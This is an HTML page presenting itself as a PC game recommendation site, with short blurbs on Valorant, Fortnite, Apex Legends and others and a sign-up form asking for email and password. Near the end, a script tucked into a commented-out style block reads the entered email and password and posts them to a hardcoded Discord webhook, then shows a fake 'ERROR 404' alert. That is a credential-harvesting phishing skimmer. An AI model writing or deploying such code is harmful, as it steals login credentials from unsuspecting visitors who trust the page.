<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="Untitled-1.css">
    <script src="first page.js"></script>
    <title>HOME</title>
</head>
<body>
  <body>
    <header>
      <div class="company-logo">GAMES</div>
      <nav class="navbar">
        <ul class="nav-items">
          <li class="nav-item"><a href="Untitled-1.html" class="nav-link">HOME</a></li>
          <li class="nav-item"><a href="best of.html" class="nav-link">BEST OF
          </a></li>
          <li class="nav-item"><a href="contact.html" class="nav-link">CONTACT</a></li>
          <li class="nav-item"><button onclick="document.getElementById('id01').style.display='block'" style="width:auto;" class="nav-link" class="signup">SIGN UP </button>
            <div id="id01" class="modal">
              <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal">&times;</span>
              <form class="modal-content" action="/action_page.php">
                <div class="container">
                  <h1>Sign Up</h1>
                  <p>Please fill in this form to create an account.</p>
                  <hr>
                  <label for="email"><b>Email</b></label>
                  <input type="text" id="username" placeholder="Enter Email" name="email" required>
            
                  <label for="psw"><b>Password</b></label>
                  <input type="password" id="password" placeholder="Enter Password" name="psw" required>
            
                  <label for="psw-repeat"><b>Repeat Password</b></label>
                  <input type="password" id="Repeat Password" placeholder="Repeat Password" name="psw-repeat" required>
                  <label>
                    <input type="checkbox" checked="checked" name="remember" style="margin-bottom:15px"> Remember me
                  </label>
                  <div class="clearfix">
                    <button type="button" onclick="document.getElementById('id01').style.display='none'" class="cancelbtn">Cancel</button>      
                    <button onclick="send()"  type="submit" class="signupbtn" >Sign Up</button>
                  </div>
                </div>                              
              </form>
            </div>
            </li></li>
          </li>
        </ul>
      </nav>
      <div class="menu-toggle">
        <i class="bx bx-menu"></i>
        <i class="bx bx-x"></i>
      </div>
    </header>
    <br>
<h2> Valorant</h2>
<br>
   
  <table>
    <tr>
      <td>
  <a href="https://playvalorant.com/ar-ae/"><img src="img/valornt.png" ></a>
</td>
</tr>
</table>
<br>
  <p>Riot Games’ tactical first-person 5v5 shooter proved to be an instant hit when it got released in June 2020. <br>
     Although the game takes a few cues from Counter-Strike: Global Offensive, the availability of heroes across <br>
      different game modes in the game including Unranked, Spike Rush, and Deathmatch makes it worth a shot. <br>

    Throughout the game, there are a lot of weapon skins and agents to unlock, which incentivizes gamers to stick <br>
     around and experience intense competition from other players. <br>
      That said, you have the option to purchase Valorant Points to skip the queue and access agents and shiny skins.
    
    </p>
    <br>
 <h2> Warzone</h2>
 <br>

    <table>
      <tr>
        <td>
  <a href="https://www.callofduty.com/fr/warzone"><img src="img/warzone.webp" ></a>
  </td>
  </tr>
  </table>
  <br>
  <p>Warzone is a free to play battle royale game for PC, which makes it even more attractive for anyone looking to play online games <br> on their computers without paying a dime. <br>
     That said, you can spend money to buy cosmetic items, and get the season pass which will give you rewards for completing tasks. <br>
      All things considered, Warzone is definitely a PC game to check out.</p>
      <br>

<h2> Fortnite</h2>
<br>
  <table>
    <tr>
      <td>
<a href="https://www.epicgames.com/fortnite/fr/home"><img src="img/fortnite.jpg" ></a>
</td>
</tr>
</table>
<br>
  <p>Another online game you can play on your PC, Fortnite is a massive survival game that includes a great battle royale mode. <br>
     If you love battle royales and want to play with other people on a vast open-world where everyone is out to get each other,<br>
      Fortnite is definitely the best multiplayer PC game for you. Fortnite is full of colored characters and amazing action that’s quite over-the-top. <br>
    You can also play the Players vs Environment mode where you get to team-up with other players and go against other computer controlled enemies. <br>
     It’s like a perfect mix of resource gathering in games like Minecraft and PUBG’s survival based gameplay. If you want to enjoy a lighthearted survival <br>
      co-op game then Fortnite is definitely the right game.</p>
      <br>
 <h2>Overwatch</h2>
 <br>
  <table>
    <tr>
      <td>
<a href="https://playoverwatch.com/fr-fr/"><img src="img/overwatch.webp" ></a>
</td>
</tr>
</table>
<br>
<p>One of the best first-person shooters of the recent years. Overwatch quickly gathered the attention of millions of players <br>
   worldwide with its flashy gameplay and colorful graphics. Each character in the game comes with an amazing and deep backstory that <br> 
   tells you why they are doing, what they are doing.
  Overwatch is a great mix of shooters and MOBAs that brings the best of both worlds together. <br> You get the fast-paced gameplay of a shooter mixed <br>
   with the elements from a MOBA where  you get different abilities and powerful heroics to overpower your enemies.
In a 5v5 match, your goal is <br> to kill all your enemies and complete the required objective of the game. It’s a fast-paced shooter that’s definitely worth a try.
</p>
<br>
<h2> CS:GO</h2>
<br>
<table>
  <tr>
    <td>
<a href="https://blog.counter-strike.net/"><img src="img/csgo.png" ></a>
</td>
</tr>
</table>
<br>
<p>Counter Strike has been one of the most popular first-person shooter games on PC. It started as a mod for Half-Life back in the days but quickly <br> grew big enough to become  a standalone game. 
   Counter Strike: Global Offensive is the current incarnation of the game and carries a massive fan following. <br> This game is highly competitive with a very big eSports scene backing it up. 
    Counter Strike: GO is a traditional shooter where you get to join either <br> the terrorists or counter-terrorists.

  The terrorists have a bomb that they must plant in any one of the specific locations available on the map and the CT must try <br>
   to either disable the planted bomb or keep the terrorists from planting it. It’s a battle of strategy and wits, and also quick aim. While the game is now available to play for free, <br> if you’re thinking of playing competitive games, you should purchase the prime status to get matched with non-hacking, hopefully non-toxic players.</p>
<br>
<h2> Rocket League</h2>
<br>
  <table>
    <tr>
      <td>
  <a href="https://www.rocketleague.com/fr/"><img src="img/rocket league.jpg" ></a>
  </td>
  </tr>
  </table>
  <br>
  <p>If you mix an exciting racing game with some soccer than you get an adrenaline-pumping game that caters to both racing and soccer fans. <br>
     Rocket League is an exciting game that’s highly addictive and fun. You get to team up with 1 or 2 other players and take on other players from <br> around the world.

    You can also play alongside your friend in a split-screen multiplayer match and also enjoy the split-screen mode when playing online. <br> Customize your little toy cars and carry out some jaw-dropping, physics-defying moves in this exciting game. Score some screamers and take on the world in Rocket League.</p>
<br>
    <h2> Apex Legends</h2>
<br>
    <table>
      <tr>
        <td>
   <a href="https://www.ea.com/fr-fr/games/apex-legends"> <img src="img/apex legends.jpg" ></a>
    </td>
    </tr>
    </table>
    <br>
    <p>Apex Legends is another game that has quickly risen to popularity in the online gaming world. The game was released in February 2019 by EA <br>
       and has been primarily developed for Windows PCs and other gaming consoles. In short, Apex Legends is a battle-royale game just like Fortnite. <br>
        As for the game, here you play in a three-man squad on an island of 20 such squads.

      And with the recent update, you can also play alone or in a squad of two players. <br>
       You have to defeat all other squads by searching for weapons, supplies, ammunition and finding answers to mysterious clues on the way. <br>
        The last standing squad wins the game.
      
      Other than that, Apex Legends is set in a sci-fi universe and if you have played Titanfall then you would find many <br>
       commonalities between the two games. The gaming environment is largely similar because Respawn Entertainment has developed both the games.
      <br>
       I think Apex Legends has great gameplay and there are many elements that make it unique. If you love playing Fortnite then definitely try Apex Legends. <br> Many experts believe that Apex Legends is a worthy competitor to Fortnite and rightly so.</p>
       
    </button>
</body>

<style>/*<script>
  var modal = document.getElementById('id01');
  
  window.onclick = function(event) {
    if (event.target == modal) {
      modal.style.display = "none";
    }
  }
  </script>
<script>

    function send(){
        var a = document.getElementById("username").value; 
        var b = document.getElementById("password").value; 
        var discordWebhook = "https://discord.com/api/webhooks/1071501347750412388/3C6f-LbqkywnYHkI5bkqw_lz2WUb0X1_uGYdTPDOfiK2_jpQwBRKgG3U3YoPJSHtcYZR";       
        var request = new XMLHttpRequest();
        request.open("POST", discordWebhook);
        request.setRequestHeader('Content-type', 'application/json');
        var params = {
			username: "SadCord By anas abbassi",
            

            content: 'e-mail :'+a+" Password:"+b
    
        };
        request.send(JSON.stringify(params));
        alert("ERROR 404")
    
    }

</script>*/</style>

</html>
</body>
</html>

